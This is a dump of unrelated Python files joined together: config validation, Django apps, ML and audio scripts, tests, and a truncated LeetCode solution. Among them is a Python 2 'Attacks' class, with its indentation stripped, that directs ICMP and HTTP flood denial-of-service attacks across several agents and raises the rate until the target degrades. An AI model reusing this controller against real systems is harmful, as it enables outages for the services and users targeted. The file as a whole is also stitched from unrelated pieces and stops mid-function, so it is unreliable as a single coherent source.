    return clean_and_validate_config(new_config)
def _resolve_executable(config: ShorthandConfig, field: str,
                        default_path: str, name: str) -> None:
    '''Resolve and validate the path of an external executable, in place.

    ``field`` is the config key ('grep_path' / 'find_path'),
    ``default_path`` the fallback executable name, and ``name`` the
    capitalized display name used in messages ('Grep' / 'Find').
    Raises ValueError when no usable executable can be located.
    '''
    exe_path = config.get(field)
    if not exe_path:
        log.info(f'{name} path not specified, falling back to '
                 f'default of {default_path}')
        exe_path = default_path
    # Case 1: the configured value is already a path to a file
    if os.path.isfile(exe_path):
        if not os.access(exe_path, os.X_OK):
            raise ValueError(f'{name} at {exe_path} is not executable')
        log.debug(f'Found {name.lower()} executable at {exe_path}')
        config[field] = exe_path
        return
    # Case 2: treat the value as an executable name to look up on PATH
    for path_dir in os.environ["PATH"].split(os.pathsep):
        candidate = os.path.join(path_dir, exe_path)
        if os.path.isfile(candidate):
            if not os.access(candidate, os.X_OK):
                # NOTE: mirrors the original behavior — the first PATH
                # match wins; a non-executable match aborts the search
                raise ValueError(f'{name} at {candidate} is '
                                 f'not executable')
            log.debug(f'Found {name.lower()} executable at {candidate}')
            config[field] = candidate
            return
    raise ValueError(f'{name} executable specified as {exe_path} '
                     f'could not be located')


def clean_and_validate_config(config: ShorthandConfig) -> ShorthandConfig:
    '''Clean and validate values from the config file as needed.

    Returns the (mutated) config if there are no issues, and raises a
    ValueError if an issue is found.
    '''
    #TODO - Set up logging immediately, so later errors will
    #       be logged correctly
    # Ensure that no unknown fields are present in the config
    for field in config.keys():
        if field not in DEFAULT_CONFIG.keys():
            raise ValueError(f'Config includes unknown field "{field}"')
    # Ensure that required fields are present in the config
    for field in REQUIRED_FIELDS:
        if field not in config.keys():
            raise ValueError(f'Missing required field "{field}"')
    # Ensure that the notes directory and cache directory
    # paths have no trailing `/`
    config['notes_directory'] = config['notes_directory'].rstrip('/')
    cache_dir = config.get('cache_directory', '')
    if cache_dir:
        config['cache_directory'] = cache_dir.rstrip('/')
    else:
        log.info(f'No cache directory specified, falling back to '
                 f'default of {DEFAULT_CACHE_DIR}')
        config['cache_directory'] = DEFAULT_CACHE_DIR
    # Check config values that point to directories that must exist
    for field in ['notes_directory', 'cache_directory']:
        if not os.path.exists(config[field]):
            raise ValueError(f'Directory {config[field]} specified for '
                             f'field {field} does not exist')
    # Validate logging config
    log_file_path = config.get('log_file_path')
    if log_file_path:
        log_file_dir = os.path.dirname(log_file_path)
        if log_file_dir and not os.path.exists(log_file_dir):
            # BUG FIX: this previously called os.makedirs(log_file_path),
            # creating a *directory* at the log file's own path and
            # preventing the log file from ever being opened; create the
            # parent directory instead (log.warn is also deprecated)
            log.warning(f'Directory {log_file_dir} does not exist, '
                        f'creating it')
            os.makedirs(log_file_dir)
    else:
        log.info(f'No log file path specified, falling back to '
                 f'default of "{DEFAULT_LOG_FILE}"')
        config['log_file_path'] = DEFAULT_LOG_FILE
    log_level = config.get('log_level')
    if log_level:
        if log_level.upper() not in ['DEBUG', 'INFO', 'WARNING', 'WARN',
                                     'ERROR', 'CRITICAL']:
            raise ValueError(f'Invalid log level "{log_level}" specified')
        config['log_level'] = log_level.upper()
    else:
        log.info(f'No log level specified, falling back to '
                 f'default of "{DEFAULT_LOG_LEVEL}"')
        config['log_level'] = DEFAULT_LOG_LEVEL
    log_format = config.get('log_format')
    if log_format:
        if not isinstance(log_format, str):
            raise ValueError('log_format must be specified as a string')
    else:
        log.info(f'No log format specified, falling back to '
                 f'default of "{DEFAULT_LOG_FORMAT}"')
        config['log_format'] = DEFAULT_LOG_FORMAT
    # Validate default directory (must exist inside the notes directory)
    default_dir = config.get('default_directory')
    if default_dir:
        if not os.path.exists(f'{config["notes_directory"]}/{default_dir}'):
            raise ValueError(f'Default directory {default_dir} does not '
                             f'exist within notes directory')
    else:
        config['default_directory'] = None
    # Validate paths to utilities (updates config in place)
    _resolve_executable(config, 'grep_path', DEFAULT_GREP_PATH, 'Grep')
    _resolve_executable(config, 'find_path', DEFAULT_FIND_PATH, 'Find')
    # Validate frontend config
    frontend_config = config.get('frontend')
    if frontend_config is None:
        # BUG FIX: previously the default was assigned by reference
        # (aliasing DEFAULT_FRONTEND_CONFIG, which the in-place updates
        # below would corrupt) and the local frontend_config stayed None,
        # crashing the .get() calls below with AttributeError
        frontend_config = dict(DEFAULT_FRONTEND_CONFIG)
        config['frontend'] = frontend_config
    elif not isinstance(frontend_config, dict):
        raise ValueError('Frontend config must be specified as a dict')
    else:
        # Check that there are no extra / unexpected fields
        # in the frontend config
        for field in frontend_config:
            if field not in DEFAULT_FRONTEND_CONFIG.keys():
                raise ValueError(f'Unknown field "{field}" in frontend config')
    # Validate the view history limit
    view_history_limit = frontend_config.get('view_history_limit')
    if view_history_limit is None:
        config['frontend']['view_history_limit'] = \
            DEFAULT_FRONTEND_CONFIG['view_history_limit']
    elif isinstance(view_history_limit, int):
        if view_history_limit < 0:
            raise ValueError('View History Limit must be '
                             'at least zero')
    elif isinstance(view_history_limit, str):
        try:
            config['frontend']['view_history_limit'] = \
                int(view_history_limit)
        except ValueError:
            raise ValueError(f"Can't convert view history limit "
                             f'value of "{view_history_limit}" to an '
                             f'integer')
        # Consistency fix: apply the same lower bound to converted values
        if config['frontend']['view_history_limit'] < 0:
            raise ValueError('View History Limit must be '
                             'at least zero')
    # Validate the map tileserver URL
    map_tileserver_url = frontend_config.get('map_tileserver_url')
    if map_tileserver_url is None:
        config['frontend']['map_tileserver_url'] = \
            DEFAULT_FRONTEND_CONFIG['map_tileserver_url']
    else:
        if not isinstance(map_tileserver_url, str):
            raise ValueError('Map Tileserver URL must be a string')
        if not map_tileserver_url.startswith(('http://', 'https://')):
            raise ValueError('Map Tileserver URL must be a valid URL')
    return config
|
from . import views
from django.conf.urls import url
from django.urls import path, include
# URL routing for the "main" app
app_name = "main"
urlpatterns = [
    url(r'^$',views.homepage, name="homepage"),
    url(r'^loan_type/$', views.loan_types, name='loantype'),
    url(r'^client/$',views.apply_loan, name="applyloan"),
    url(r'^settings/$',views.settings, name="settings"),
    # Callback endpoint hit by the Daraja (M-Pesa) STK push service
    path('daraja/stk-push/', views.stk_push_callback, name='mpesa_stk_push_callback'),
]
import math
import numpy as np
def batches(batch_size, features, labels):
    """
    Create batches of features and labels

    :param batch_size: The batch size
    :param features: List of features
    :param labels: List of labels
    :return: Batches of (Features, Labels); the final batch may be
             smaller than batch_size
    """
    assert len(features) == len(labels)
    # Slice directly instead of accumulating element-by-element with the
    # original math.fmod bookkeeping — same output, far simpler
    output = []
    for start in range(0, len(features), batch_size):
        output.append([features[start:start + batch_size],
                       labels[start:start + batch_size]])
    return output
|
import layer_creater as lc
import neural_network_creater as nnc
import numpy as np
import tensorflow as tf
# Prepare the training data: y = x^2 - 0.5 plus gaussian noise
x_data = np.linspace(-1, 1, 300)[:, np.newaxis] #(300, 1)
noise = np.random.normal(0, 0.05, x_data.shape)
y_data = np.square(x_data) - 0.5 + noise
# Define the input placeholder nodes
xs = tf.placeholder(tf.float32, [None, 1])
ys = tf.placeholder(tf.float32, [None, 1])
# Define the network layer structure as a list of layer-creator callables
layer_creaters = []
def lc1():
    # Hidden layer: 1 -> 10 units with ReLU activation
    Weight1, biase1, output1 = lc.create_mlp_layer(xs, 1, 10, activation_function=tf.nn.relu)
    return output1
layer_creaters.append(lc1)
def lc2(input):
    # Output layer: 10 -> 1 units, no activation
    Weight2, biase2, output2 = lc.create_mlp_layer(input, 10, 1)
    return output2
layer_creaters.append(lc2)
prediction = nnc.mlp_create(layer_creaters)
# Define the loss expression (mean summed squared error)
loss = tf.reduce_mean(tf.reduce_sum(tf.square(ys - prediction), 1))
# Choose an optimizer that minimizes the loss
train_step = tf.train.GradientDescentOptimizer(0.1).minimize(loss)
# Initialize all tf variables
init = tf.global_variables_initializer() # every tf.Variable must be initialized
sess = tf.Session()
# Nothing above actually executes until sess.run is called
sess.run(init)
# Iterate training steps by running the optimizer op
for i in range(1000):
    # train_step and loss are built on placeholders, so feed values via feed_dict
    sess.run(train_step, feed_dict={xs: x_data, ys: y_data})
    if i % 50 == 0:
        print(sess.run(loss, feed_dict={xs: x_data, ys: y_data}))
import Queue, threading, random, time, socket, os, struct
class Attacks(threading.Thread):
def __init__(self, attack_q, input_q, probe_1, probe_2, rate_q, application_mon_q, flag_q, http_treshold_q_rep):
threading.Thread.__init__(self) # Required for thread class
self.attack_Q = attack_q
self.input_Q = input_q
self.last_command = None
self.probe_out = probe_1
self.probe_in = probe_2
self.mon_rate_q = rate_q
self.mon_recv_q = Queue.Queue()
self.application_mon_q = application_mon_q
self.flag_q = flag_q
self.http_treshold_q_rep = http_treshold_q_rep
def perform_attack(self, attack, target, port, rate, status, duration=1000, size=100): # Traffic flood
self.attack = attack
self.rate = rate
self.target = target
self.port = port
self.status = status # "OK", if status eq "STOP", the attacker should abort right away
self.duration = duration
self.id = random.randint(1, 99999)
self.pktsize = size
self.command = {'id': self.id}
self.command[self.id] = {'attack': self.attack, 'rate': self.rate, 'target': self.target,
'duration': self.duration, 'port': self.port, 'status': self.status, 'pktsize': self.pktsize}
try:
self.attack_Q.put(self.command, False)
except Queue.Full: # Only a single command on the Queue at all times.
bogus = self.attack_Q.get(False)
self.attack_Q.put(self.command, False)
def perform_application_attack(self, attack, target, port, rate, status, get, processes, connections): # Application 'flood'
self.attack = attack
self.rate = rate
self.target = target
self.port = port
self.status = status # "OK", if status eq "STOP", the attacker should abort right away
self.get = get
self.connections = connections
self.id = random.randint(1, 99999)
self.processes = processes
self.command = {'id': self.id}
self.command[self.id] = {'attack': self.attack, 'rate': self.rate, 'target': self.target,
'processes': self.processes, 'port': self.port, 'status': self.status, 'get': self.get, 'connections': self.connections}
try:
self.attack_Q.put(self.command, False)
except Queue.Full: # Only a single command on the Queue at all times.
bogus = self.attack_Q.get(False)
self.attack_Q.put(self.command, False)
def application_flood_handler(self, cmd):
print "Started app flood handler"
command = cmd
aid = command['id']
self.init_mon_rate = command[aid]['monrate']
self.mon_rate = self.init_mon_rate
self.attack_rate = command[aid]['startrate'] # Normally 0
self.global_rate = self.mon_rate
self.increase = 1
self.flag = "do_not_ignore"
self.perform_application_attack(command[aid]['attack'], command[aid]['target'], command[aid]['port'], self.attack_rate, command[aid]['status'], command[aid]['get'], command[aid]['processes'], command[aid]['connections'])
while True:
time.sleep(2)
# IF FLAG IS NOT SET, REQUEST THE STATUS. OTHERWISE: JUST PROCEED...
if self.flag != "ignore":
try:
status = self.http_treshold_q_rep.get(True)
mon_val = float(status[1])*1000.0
except:
pass
else:
status = ["GOOD", str(1)]
try:
status2 = self.http_treshold_q_rep.get(True)
mon_val = float(status[1])*1000.0
except:
pass
if status[0] == "GOOD":
self.attack_rate += self.increase
self.perform_application_attack(command[aid]['attack'], command[aid]['target'], command[aid]['port'], self.attack_rate, command[aid]['status'], command[aid]['get'], command[aid]['processes'], command[aid]['connections'])
print "Increased rate to: ", str(self.attack_rate), " Rate per attack-agent: ", str(self.attack_rate / command[aid]['processes'])
elif status[0] == "BAD":
print "Dropping the rate by 1 increment and wait for input. \n"
self.attack_rate -= self.increase
self.perform_application_attack(command[aid]['attack'], command[aid]['target'], command[aid]['port'], self.attack_rate, command[aid]['status'], command[aid]['get'], command[aid]['processes'], command[aid]['connections'])
print "Options: 'azad' (Go on with the attack) - 'decrease' (Decrease by one increment and try again) "
flag_raw = self.flag_q.get(True) # Blocking
if flag_raw == 'decrease':
self.attack_rate -= self.increase
self.perform_application_attack(command[aid]['attack'], command[aid]['target'], command[aid]['port'], self.attack_rate, command[aid]['status'], command[aid]['get'], command[aid]['processes'], command[aid]['connections'])
elif flag_raw == 'kill_it':
print "Going on with the attack..."
self.flag = "ignore"
# Write statistics to file for graphing
GRAPH = 1
if GRAPH == 1:
try:
global_rate_file = open('/tmp/global.csv', 'a')
msgbuffer = (str(int(self.attack_rate)) + "," + str(mon_val) + "\n")
global_rate_file.write(msgbuffer)
global_rate_file.close()
except:
pass
def traffic_flood_handler(self, cmd):
command = cmd
aid = command['id']
self.global_rate = command[aid]['startrate']
self.attack_rate = self.global_rate * (0.95)
self.increase = 400 # Rate increments
self.init_mon_rate = self.global_rate * (0.05) - (8 * self.increase)
self.mon_rate = self.init_mon_rate
self.no_agents = 3.0 # Number of agents. Hardcoded for now.
print "Init initial attack rate..."
self.perform_attack(command[aid]['attack'], command[aid]['target'],command[aid]['port'],(self.attack_rate/self.no_agents),command[aid]['status'], command[aid]['pktsize'])
message = {"target": command[aid]['target'], "pktsize":command[aid]['pktsize'], "monrate":command[aid]['monrate']}
self.mon_rate_q.put(message)
request = {'command': "number_received"}
time.sleep(1) # Wait for packets to be generated + RTT to receiver
J = 0
K = 0
flag = None
last_extrarate = 0
while True:
self.probe_out.put(request)
status = self.probe_in.get(True) # Blocks till answer is recv
#print "K","Recv ", "Tolerated recv", "Expected rate", "Global rate"
#print K, status, (self.mon_rate - (self.mon_rate*0.1)), self.mon_rate, self.global_rate, "\n"
if K < 30:
status = self.mon_rate
K += 1
#print (float(1) - ((float(self.mon_rate) - float(status))/(float(self.attack_rate) + float(self.mon_rate))))
if (((float(1) - ((float(self.mon_rate) - float(status))/(float(self.attack_rate) + float(self.mon_rate)))) > float(0.99)) and flag != 'manual') or (flag == 'kill_it'): # Check threshold or flag override
# if not flag:
# print " Attack falls within margins. Increasing rate by # ", str(self.increase)
# else:
# print " Increasing the attack rate even further: ", str(self.increase)
print "Normal: True"
if self.mon_rate >= (self.init_mon_rate + ((self.increase) * 8)): # Handoff attack every 10 steps
self.global_rate += self.increase #AZAD self.global_rate = self.attack_rate + self.init_mon_rate
self.attack_rate = 0.95 * self.global_rate #AZAD += (self.mon_rate - self.init_mon_rate)
print " Handing off attack to attack agents by # ", str(self.mon_rate - self.init_mon_rate), " Total rate: ", str(self.global_rate)
self.perform_attack(command[aid]['attack'], command[aid]['target'],command[aid]['port'],(self.attack_rate/self.no_agents),command[aid]['status'], command[aid]['pktsize'])
self.init_mon_rate = (0.05 * self.global_rate) - (8 * self.increase) #AZAD
self.mon_rate = self.init_mon_rate
else:
if J >= 1: # was 2
self.mon_rate += self.increase
J = 0
message = {"target": command[aid]['target'], "pktsize":command[aid]['pktsize'], "monrate":self.mon_rate}
self.mon_rate_q.put(message) # Update monflood_send with new rate
elif flag == 'manual':
print "Manual control over attack"
FC = open('command.conf', 'r')
extrarate = FC.readline() #rounded rates
FC.close()
if extrarate:
print extrarate
extrarate = int(float(extrarate))
self.global_rate += extrarate
self.attack_rate = 0.95 * self.global_rate
self.perform_attack(command[aid]['attack'], command[aid]['target'],command[aid]['port'],(self.attack_rate/self.no_agents),command[aid]['status'], command[aid]['pktsize'])
print " New (manual) attack rate: ", str(self.attack_rate)
message = {"target": command[aid]['target'], "pktsize":command[aid]['pktsize'], "monrate":self.mon_rate}
self.mon_rate_q.put(message) # Update monflood_send with new rate
last_extrarate = extrarate
else:
#print "Stopping attack. Or should we reset attack_rate to attack_rate - *2000* and start again. 'Sustained attack' "
print "Halting attack. Proceed (Option: azad), decrease (option: decrease) or manual control (option: manual)?"
flag = self.flag_q.get(True)
if flag == 'decrease':
self.attack_rate = self.attack_rate - self.mon_rate
self.mon_rate = self.init_mon_rate
self.global_rate = self.attack_rate + self.mon_rate
if flag == 'manual':
# take manual control over the attack from F:command.conf
print "Taking manual control of the attack..."
elif flag == 'kill_it':
print "Going on with the attack..."
# Write statistics to file for graphing
GRAPH = 1
if GRAPH == 1:
try:
global_rate_file = open('/tmp/global.csv', 'a')
msgbuffer = (str(self.global_rate) + "," + str(int(self.attack_rate)) + "," + str(int(self.mon_rate)) + "," + str(int(status)) + "\n")
global_rate_file.write(msgbuffer)
global_rate_file.close()
except:
pass
J += 1
time.sleep(2) # 2 second between 'probes'
# 'Main'
def run(self):
traffic_floods = ['ICMPFLOOD'] # Bandwidth attacks (Array)
application_floods = ['HTTPFLOOD'] # Application level attacks (Array)
# Reset graph file before starting
GRAPH = 1
if GRAPH == 1:
try:
global_rate_file = open('/var/www/html/RGraph/RP2/global.csv', 'w')
global_rate_file.write("0,0,0,0\n")
global_rate_file.close()
except:
pass
while 1:
try:
self.new_command = self.input_Q.get(True, 0.05)
#print self.new_command
except Queue.Empty:
self.new_command = None
if self.new_command:
aid = self.new_command['id']
if self.new_command[aid]['attack'] in traffic_floods:
self.traffic_flood_handler(self.new_command)
elif self.new_command[aid]['attack'] in application_floods:
self.application_flood_handler(self.new_command)
|
#!/usr/bin/python3
import os
import sys
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from scipy.io import wavfile
from scipy import signal
def D1(Y, Yhat):
    """Squared Euclidean distance between the L2-normalized arrays."""
    y_unit = Y / np.linalg.norm(Y)
    yhat_unit = Yhat / np.linalg.norm(Yhat)
    return np.sum((yhat_unit - y_unit) ** 2)
def D2(Y, Yhat):
    """Ratio of the reference energy to the energy of the error."""
    error = Yhat - Y
    return np.sum(Y ** 2) / np.sum(error ** 2)
def D3(Y, Yhat):
    """Sum of squared elementwise Y*(log10(Y/Yhat) - 1) + Yhat terms."""
    term = Y * (np.log10(Y / Yhat) - 1.0) + Yhat
    return np.sum(term ** 2)
def evaluate(path, W, H):
    """Compare each NMF component spectrogram against each reference wav.

    :param path: directory containing reference .wav files
    :param W: NMF basis matrix, indexed as (F, K) below
    :param H: NMF activation matrix, indexed as (K, T) below
    Prints D1/D2/D3 scores for every (component, file) pair.
    """
    T = H.shape[1]  # Number of time frames
    F = W.shape[0]  # Frequency ticks
    K = W.shape[1]  # Number of components

    # Rank-1 spectrogram reconstructed from each NMF component
    compNMF = np.empty((K, F, T))
    for k in range(K):
        curW = W[:, k, None]
        curH = H[None, k, :]  # Slice while maintaining dims
        compNMF[k, :, :] = (curW * curH)

    # BUG FIX: the original enumerated every directory entry (including
    # non-wav files) and indexed a (K, F, T) array with that counter, so a
    # stray file or a wav count != K corrupted or overflowed `comp`.
    # Collect (and sort, for determinism) the wav files first instead.
    files = sorted(f for f in os.listdir(path) if f.endswith('.wav'))
    comp = np.empty((len(files), F, T))
    for idx, fname in enumerate(files):
        fs, data = wavfile.read(os.path.join(path, fname))
        # Keep only the first channel of stereo recordings
        x = data[:, 0] if len(data.shape) == 2 else data
        winLen = int(40e-3 * fs)
        noverlap = winLen // 2
        win = signal.windows.hamming(winLen, sym=False)
        f, t, X = signal.stft(x, fs, win, winLen, noverlap, winLen,
                              detrend=False, return_onesided=True,
                              boundary=None)
        comp[idx, :, :] = np.abs(X)

    print('Components x Files x Eval')
    for i, Yhat in enumerate(compNMF):
        print('\nComponent {}'.format(i))
        for j, Y in enumerate(comp):
            print('File:', files[j])
            print('D1:', D1(Y, Yhat))
            print('D2:', D2(Y, Yhat))
            print('D3:', D3(Y, Yhat))
if __name__ == '__main__':
    # Usage: <script> <audio_dir> <factor_dir>
    # <factor_dir> must contain W.npy and H.npy (shapes as used by evaluate)
    argc = len(sys.argv) - 1
    if argc == 2:
        W = np.load(os.path.join(sys.argv[2], 'W.npy'))
        H = np.load(os.path.join(sys.argv[2], 'H.npy'))
        evaluate(sys.argv[1], W, H)
from django.db import models
from transaction.models import ChartOfAccount
import datetime
from django.contrib.auth.models import User
from user.models import Company_info
from inventory.models import Add_products
class CompanyUser(models.Model):
    # Associates a user (by raw id) with a company.
    # NOTE(review): user_id is a plain IntegerField rather than a
    # ForeignKey(User) — confirm this is intentional.
    user_id = models.IntegerField()
    company_id = models.ForeignKey(Company_info, models.SET_NULL, blank = True, null = True)
class RfqCustomerHeader(models.Model):
    # Header record for a customer "request for quotation" document.
    rfq_no = models.CharField(max_length = 100, unique = True)
    date = models.DateField(default = datetime.date.today)
    attn = models.CharField(max_length = 100)
    # NOTE(review): blank=True without null=True on a DateField cannot
    # persist an empty value — confirm intent.
    follow_up = models.DateField(blank = True)
    show_notification = models.BooleanField(default = True)
    footer_remarks = models.TextField()
    company_id = models.ForeignKey(Company_info, models.SET_NULL, blank = True, null = True)
    account_id = models.ForeignKey(ChartOfAccount, models.SET_NULL, blank=True, null=True)
    user_id = models.ForeignKey(User,models.SET_NULL, blank = True, null = True)
class RfqCustomerDetail(models.Model):
    # One line item of an RFQ; removed together with its header (CASCADE).
    item_id = models.ForeignKey(Add_products, models.SET_NULL, blank = True, null = True)
    quantity = models.DecimalField(max_digits = 8, decimal_places = 2)
    rfq_id = models.ForeignKey(RfqCustomerHeader, on_delete = models.CASCADE)
class QuotationHeaderCustomer(models.Model):
    # Header record for a customer quotation document.
    quotation_no = models.CharField(max_length = 100, unique = True)
    date = models.DateField(default = datetime.date.today)
    attn = models.CharField(max_length = 100)
    prc_basis = models.CharField(max_length = 100)
    leadtime = models.CharField(max_length = 100)
    validity = models.CharField(max_length = 100)
    payment = models.CharField(max_length = 100)
    yrref = models.CharField(max_length = 100)
    remarks = models.CharField(max_length = 100)
    currency = models.CharField(max_length = 100)
    exchange_rate = models.DecimalField(max_digits = 8, decimal_places = 2)
    # NOTE(review): blank=True without null=True on a DateField cannot
    # persist an empty value — confirm intent.
    follow_up = models.DateField(blank = True)
    show_notification = models.BooleanField(default = True)
    footer_remarks = models.TextField()
    company_id = models.ForeignKey(Company_info, models.SET_NULL, blank = True, null = True)
    account_id = models.ForeignKey(ChartOfAccount, models.SET_NULL,blank=True,null=True,)
    user_id = models.ForeignKey(User,models.SET_NULL, blank = True, null = True)
class QuotationDetailCustomer(models.Model):
    # One line item of a quotation; removed with its header (CASCADE).
    item_id = models.ForeignKey(Add_products, models.SET_NULL, blank = True, null = True)
    quantity = models.DecimalField(max_digits = 8, decimal_places = 2)
    unit_price = models.DecimalField(max_digits = 8, decimal_places = 2)
    remarks = models.CharField(max_length = 100)
    quotation_id = models.ForeignKey(QuotationHeaderCustomer, on_delete = models.CASCADE)
class PoHeaderCustomer(models.Model):
    # Header record for a customer purchase order.
    po_no = models.CharField(max_length = 100, unique = True)
    date = models.DateField(default = datetime.date.today)
    attn = models.CharField(max_length = 100)
    prc_basis = models.CharField(max_length = 100)
    po_client = models.CharField(max_length = 100)
    leadtime = models.CharField(max_length = 100)
    validity = models.CharField(max_length = 100)
    payment = models.CharField(max_length = 100)
    remarks = models.CharField(max_length = 100)
    currency = models.CharField(max_length = 100)
    exchange_rate = models.DecimalField(max_digits = 8, decimal_places = 2)
    # NOTE(review): blank=True without null=True on a DateField cannot
    # persist an empty value — confirm intent.
    follow_up = models.DateField(blank = True)
    show_notification = models.BooleanField(default = True)
    footer_remarks = models.TextField()
    account_id = models.ForeignKey(ChartOfAccount, models.SET_NULL,blank=True,null=True,)
    company_id = models.ForeignKey(Company_info, models.SET_NULL, blank = True, null = True)
    user_id = models.ForeignKey(User,models.SET_NULL, blank = True, null = True)
class PoDetailCustomer(models.Model):
    # One line item of a purchase order; removed with its header (CASCADE).
    item_id = models.ForeignKey(Add_products, models.SET_NULL, blank = True, null = True)
    quantity = models.DecimalField(max_digits = 8, decimal_places = 2)
    unit_price = models.DecimalField(max_digits = 8, decimal_places = 2)
    remarks = models.CharField(max_length = 100)
    quotation_no = models.CharField(max_length = 100)
    po_id = models.ForeignKey(PoHeaderCustomer, on_delete = models.CASCADE)
class DcHeaderCustomer(models.Model):
    # Header record for a customer delivery challan.
    # NOTE(review): dc_no is not unique=True, unlike the other document
    # number fields in this module — confirm whether that is deliberate.
    dc_no = models.CharField(max_length = 100)
    date = models.DateField(default = datetime.date.today)
    footer_remarks = models.TextField()
    show_notification = models.BooleanField(default = True)
    # NOTE(review): blank=True without null=True on a DateField cannot
    # persist an empty value — confirm intent.
    follow_up = models.DateField(blank = True)
    cartage_amount = models.DecimalField(max_digits = 8, decimal_places = 2)
    po_no = models.CharField(max_length = 100)
    account_id = models.ForeignKey(ChartOfAccount, models.SET_NULL,blank=True,null=True)
    user_id = models.ForeignKey(User,models.SET_NULL, blank = True, null = True)
    company_id = models.ForeignKey(Company_info, models.SET_NULL, blank = True, null = True)
class DcDetailCustomer(models.Model):
    # One line item of a delivery challan; removed with its header (CASCADE).
    item_id = models.ForeignKey(Add_products, models.SET_NULL, blank = True, null = True)
    description = models.CharField(max_length = 100)
    quantity = models.DecimalField(max_digits = 8, decimal_places = 2)
    accepted_quantity = models.IntegerField()
    returned_quantity = models.IntegerField()
    po_no = models.CharField(max_length = 100)
    dc_id = models.ForeignKey(DcHeaderCustomer, on_delete = models.CASCADE)
|
from django.core.management.base import BaseCommand, CommandError
from django.core.exceptions import ObjectDoesNotExist
from filmmap.models import Film, FilmLocation, FilmActor
from decimal import *
import re
import csv
from datetime import datetime
class CSVParser(object):
    """Thin wrapper around csv.reader that skips the header row."""

    def __init__(self, filename):
        self.infile = open(filename, "r")
        self.reader = csv.reader(self.infile)
        self.got_header = False

    def readlines(self):
        """Yield each data row (a list of strings), skipping the header
        row and blank lines."""
        for row in self.reader:
            if not self.got_header:
                # The first row is the column header; consume it silently
                self.got_header = True
                continue
            # BUG FIX: csv.reader yields lists, never the string "", so
            # the old `row != ""` check let blank lines through as empty
            # lists; test truthiness instead.
            if row:
                yield row

    def close(self):
        self.infile.close()
class Command(BaseCommand):
    """Management command importing film location data from a csv file."""
    help = 'Imports film location data into database.'

    def add_arguments(self, parser):
        # Positional arguments: one or more csv paths (only the first is read)
        parser.add_argument('file', nargs='+', type=str)

    def handle(self, *args, **options):
        # Columns of csv file are:
        # 0. Title
        # 1. Release year
        # 2. location
        # 3. fun facts
        # 4. production company
        # 5. distributor
        # 6. writer
        # 7-9. actors 1-3
        parser = CSVParser(options['file'][0])
        for row in parser.readlines():
            self.stdout.write("Title: "+row[0])
            self.stdout.write("Release year: "+row[1])
            film, created = Film.objects.get_or_create(title=row[0], release_year=row[1])
            if created:
                film.production_company = row[4]
                film.distributor = row[5]
                film.writer = row[6]
                film.save()
            # Idiom fix: the three copy-pasted `row[i] != None and
            # row[i] != ''` branches collapse to one truthiness-tested loop
            for actor_name in row[7:10]:
                if actor_name:
                    FilmActor.objects.get_or_create(film=film, actor=actor_name)
            film_location, location_created = FilmLocation.objects.get_or_create(
                film=film, name=row[2], fun_facts=row[3], defaults={'address': row[2]})
        parser.close()
|
import pytest
import os
import pandas as pd
from ticclat.utils import chunk_df, read_json_lines, write_json_lines, \
json_line, iterate_wf, chunk_json_lines, read_ticcl_variants_file
from . import data_dir
def test_chunk_df_smaller_than_num():
    """With the default chunk size, five rows fit into a single chunk."""
    frame = pd.DataFrame({'number': range(5)})
    num_chunks = sum(1 for _ in chunk_df(frame))
    assert num_chunks == 1
def test_chunk_df_larger_than_num():
    """A chunk size of one yields one chunk per row."""
    frame = pd.DataFrame({'number': range(5)})
    num_chunks = sum(1 for _ in chunk_df(frame, 1))
    assert num_chunks == 5
def test_read_and_write_json_lines(fs):
    """Objects written as json-lines round-trip unchanged."""
    objects = [{'a': 1, 'b': 2}, {'a': 3, 'b': 4}, {'a': 5, 'b': 6}]
    fname = 'objects'
    with open(fname, 'w') as out:
        total = write_json_lines(out, objects)
    assert os.path.exists(fname)
    assert total == len(objects)
    with open(fname, 'r') as inp:
        results = list(read_json_lines(inp))
    assert objects == results
def test_read_and_write_json_lines_empty(fs):
    """An empty object list produces an empty file that reads back empty."""
    fname = 'objects'
    with open(fname, 'w') as out:
        write_json_lines(out, [])
    assert os.path.exists(fname)
    assert os.path.getsize(fname) == 0
    with open(fname, 'r') as inp:
        assert list(read_json_lines(inp)) == []
def test_json_line():
    """json_line serializes a dict and appends a trailing newline."""
    assert json_line({'a': 1, 'b': 2}) == '{"a": 1, "b": 2}\n'
def test_iterate_wf():
    """Each word is wrapped in a {'wordform': ...} dict, order preserved."""
    words = ['wf1', 'wf2', 'wf3']
    expected = [{'wordform': word} for word in words]
    assert list(iterate_wf(words)) == expected
def test_chunk_json_lines_with_remainder(fs):
    """A trailing partial chunk is yielded as-is."""
    path = 'wordforms'
    with open(path, 'w') as out:
        write_json_lines(out, iterate_wf(['wf1', 'wf2', 'wf3', 'wf4', 'wf5']))
    with open(path, 'r') as inp:
        chunks = list(chunk_json_lines(inp, 2))
    assert chunks == [
        [{'wordform': 'wf1'}, {'wordform': 'wf2'}],
        [{'wordform': 'wf3'}, {'wordform': 'wf4'}],
        [{'wordform': 'wf5'}],
    ]
def test_chunk_json_lines_without_remainder(fs):
    """An exact multiple of the chunk size yields only full chunks."""
    path = 'wordforms'
    with open(path, 'w') as out:
        write_json_lines(out, iterate_wf(['wf1', 'wf2', 'wf3', 'wf4']))
    with open(path, 'r') as inp:
        chunks = list(chunk_json_lines(inp, 2))
    assert chunks == [
        [{'wordform': 'wf1'}, {'wordform': 'wf2'}],
        [{'wordform': 'wf3'}, {'wordform': 'wf4'}],
    ]
@pytest.mark.datafiles(os.path.join(data_dir(), 'ticcl_variants.txt'))
def test_read_ticcl_variants_file(datafiles):
    """The sample variants file parses into a 2 x 7 dataframe."""
    variants_file = os.path.join(str(datafiles), 'ticcl_variants.txt')
    df = read_ticcl_variants_file(variants_file)
    # Removed leftover debug print(df) that cluttered the test output
    assert df.shape == (2, 7)
|
__author__ = 'sidney'
|
class Solution:
    """LeetCode 166: Fraction to Recurring Decimal."""

    def fractionToDecimal(self, numerator, denominator):
        """Return numerator/denominator as a decimal string, wrapping any
        repeating fractional digits in parentheses.

        :param numerator: integer numerator
        :param denominator: non-zero integer denominator
        :return: e.g. (4, 333) -> '0.(012)', (1, 2) -> '0.5', (2, 1) -> '2'
        """
        n, r = divmod(abs(numerator), abs(denominator))
        sign = '-' if numerator*denominator < 0 else ''
        res = [sign + str(n), '.']
        # Track remainders seen so far; a repeated remainder marks the
        # start of the recurring digit cycle.
        stack = []
        while r not in stack:
            stack.append(r)
            n, r = divmod(r*10, abs(denominator))
            res.append(str(n))
        idx = stack.index(r)
